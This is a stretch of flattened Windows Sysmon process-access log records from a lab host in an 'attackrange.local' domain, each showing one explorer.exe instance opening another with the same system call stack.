16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 